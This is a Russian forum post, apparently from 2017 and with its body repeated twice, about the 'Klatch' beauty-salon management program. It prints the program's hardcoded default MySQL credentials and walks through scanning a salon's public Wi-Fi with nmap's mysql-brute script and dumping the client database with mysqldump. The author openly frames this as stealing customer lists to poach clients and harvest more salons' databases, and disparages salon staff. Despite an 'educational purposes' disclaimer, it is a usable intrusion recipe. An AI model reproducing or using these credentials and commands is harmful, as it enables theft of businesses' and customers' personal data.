winstrool
30.11.2017, 22:22
Данная статья написана исключительно в образовательных целях. Я не преследую никакого злого умысла и, тем более, не подталкиваю никого к совершению противоправных действий
Как то по опыту работы пришлось столкнуться с программой «Клатч», которую использую, как систему управления предприятиями индустрии красоты, подробней с программой и как таковой системой, вы можете ознакомиться на официальном сайте данного пациента
https://evolution-it.ru (https://evolution-it.ru/)
http://portfob.ru/wp-content/uploads/2017/11/001-wnd31.jpg
В рамках изучения функционала, для более плотного понимания программы была скачена демо версия и развернута локально на компе, в месте с программой также ставится локально MySql сервер, где в принципе и хранятся данные, логины/пароли, данные клиентов, закупы, расходы, контрагенты, в общем, вся чувствительная информация для бизнеса. В корне программы присутствует файл с настройками подключения к БД Klatch.ini и вот пример его записи:
Code:
[connection]
host=127.0.0.1
user=metaUser
pswd=d3578efe-8825-432c-bf72-cd1d0a65de30
db=klatch_demo
это конечно все интересно и занимательно, НО! Мне также довелось пощупать и лицензионную версию в действующем салоне красоты, и там точно такой же конфиг всего лишь с разницей в название BD:
Code:
db=klatch
т.е. как следствие логин пасс к бд идет по умолчанию! Мы все прекрасно знаем, как часто люди редактируют дефолтные настройки, да ещё и к тому-же , женская аудитория, у которой мозг забит «красотой» или сисадмин который получает копейки в подобных местах.
Сейчас очень популярно стало в публичных местах, салоны красоты не исключение, ставить публичные wi-fi для клиентов. Как для любого бизнеса, утечка клиентских данных очень критична! Может увести клиентов к конкурентам при рекламной рассылке с более выгодными условиями, акциями и скидками.
Я решил смоделировать ситуацию, где установлена программа в сети под wi-fi’ем и ноут в качестве посетителя данной сети, и вот что мы получаем….
Подключаемся к сети и смотрим внутренний IP сети, командой “ipconfig”
http://portfob.ru/wp-content/uploads/2017/11/photo_2017-11-28_00-56-08.jpg
Далее берем nmap и ставим на поиск открытого порта MySql в сети и его брут по дефолтному логин/пасс:
nmap -p 3306 -n —open —script mysql-brute —script-args userdb=mysql_user.txt,passdb=mysql_pass.txt 192.168.1.0/24
http://portfob.ru/wp-content/uploads/2017/11/photo_2017-11-28_01-06-43.jpg
Запросом «mysqldump -h 192.168.1.233 -u metaUser -pd3578efe-8825-432c-bf72-cd1d0a65de30 klach > dump.sql» дампим к себе Бд где и есть заветная клиентская база данных клиентов.
Отличненько!!! Вот теперь можно заняться промывкой мозгов, потенциальных клиентов и продолжить собирать базы с салонов использующих данную программу.
Это еще не всё! Пользователь metaUser имеет файловые привилегии, что позволяет читать и создавать файлы со своим содержимым, что раскрывает для нас дополнительный вектор атаки, но это уже совсем другая история.
http://portfob.ru/wp-content/uploads/2017/11/ShooterScreenshot-166-28-11-17.png
P.S: Зеркало статьи (http://portfob.ru/security-time/%D1%83%D0%B2%D0%BE%D0%B4%D0%B8%D0%BC-%D0%BA%D0%BB%D0%B8%D0%B5%D0%BD%D1%82%D1%81%D0%BA%D 1%83%D1%8E-%D0%B1%D0%B0%D0%B7%D1%83-%D1%81-%D0%BA%D0%BB%D0%B0%D1%82%D1%87/)
Как то по опыту работы пришлось столкнуться с программой «Клатч», которую использую, как систему управления предприятиями индустрии красоты, подробней с программой и как таковой системой, вы можете ознакомиться на официальном сайте данного пациента
https://evolution-it.ru (https://evolution-it.ru/)
http://portfob.ru/wp-content/uploads/2017/11/001-wnd31.jpg
В рамках изучения функционала, для более плотного понимания программы была скачена демо версия и развернута локально на компе, в месте с программой также ставится локально MySql сервер, где в принципе и хранятся данные, логины/пароли, данные клиентов, закупы, расходы, контрагенты, в общем, вся чувствительная информация для бизнеса. В корне программы присутствует файл с настройками подключения к БД Klatch.ini и вот пример его записи:
Code:
[connection]
host=127.0.0.1
user=metaUser
pswd=d3578efe-8825-432c-bf72-cd1d0a65de30
db=klatch_demo
это конечно все интересно и занимательно, НО! Мне также довелось пощупать и лицензионную версию в действующем салоне красоты, и там точно такой же конфиг всего лишь с разницей в название BD:
Code:
db=klatch
т.е. как следствие логин пасс к бд идет по умолчанию! Мы все прекрасно знаем, как часто люди редактируют дефолтные настройки, да ещё и к тому-же , женская аудитория, у которой мозг забит «красотой» или сисадмин который получает копейки в подобных местах.
Сейчас очень популярно стало в публичных местах, салоны красоты не исключение, ставить публичные wi-fi для клиентов. Как для любого бизнеса, утечка клиентских данных очень критична! Может увести клиентов к конкурентам при рекламной рассылке с более выгодными условиями, акциями и скидками.
Я решил смоделировать ситуацию, где установлена программа в сети под wi-fi’ем и ноут в качестве посетителя данной сети, и вот что мы получаем….
Подключаемся к сети и смотрим внутренний IP сети, командой “ipconfig”
http://portfob.ru/wp-content/uploads/2017/11/photo_2017-11-28_00-56-08.jpg
Далее берем nmap и ставим на поиск открытого порта MySql в сети и его брут по дефолтному логин/пасс:
nmap -p 3306 -n —open —script mysql-brute —script-args userdb=mysql_user.txt,passdb=mysql_pass.txt 192.168.1.0/24
http://portfob.ru/wp-content/uploads/2017/11/photo_2017-11-28_01-06-43.jpg
Запросом «mysqldump -h 192.168.1.233 -u metaUser -pd3578efe-8825-432c-bf72-cd1d0a65de30 klach > dump.sql» дампим к себе Бд где и есть заветная клиентская база данных клиентов.
Отличненько!!! Вот теперь можно заняться промывкой мозгов, потенциальных клиентов и продолжить собирать базы с салонов использующих данную программу.
Это еще не всё! Пользователь metaUser имеет файловые привилегии, что позволяет читать и создавать файлы со своим содержимым, что раскрывает для нас дополнительный вектор атаки, но это уже совсем другая история.
http://portfob.ru/wp-content/uploads/2017/11/ShooterScreenshot-166-28-11-17.png
P.S: Зеркало статьи (http://portfob.ru/security-time/%D1%83%D0%B2%D0%BE%D0%B4%D0%B8%D0%BC-%D0%BA%D0%BB%D0%B8%D0%B5%D0%BD%D1%82%D1%81%D0%BA%D 1%83%D1%8E-%D0%B1%D0%B0%D0%B7%D1%83-%D1%81-%D0%BA%D0%BB%D0%B0%D1%82%D1%87/)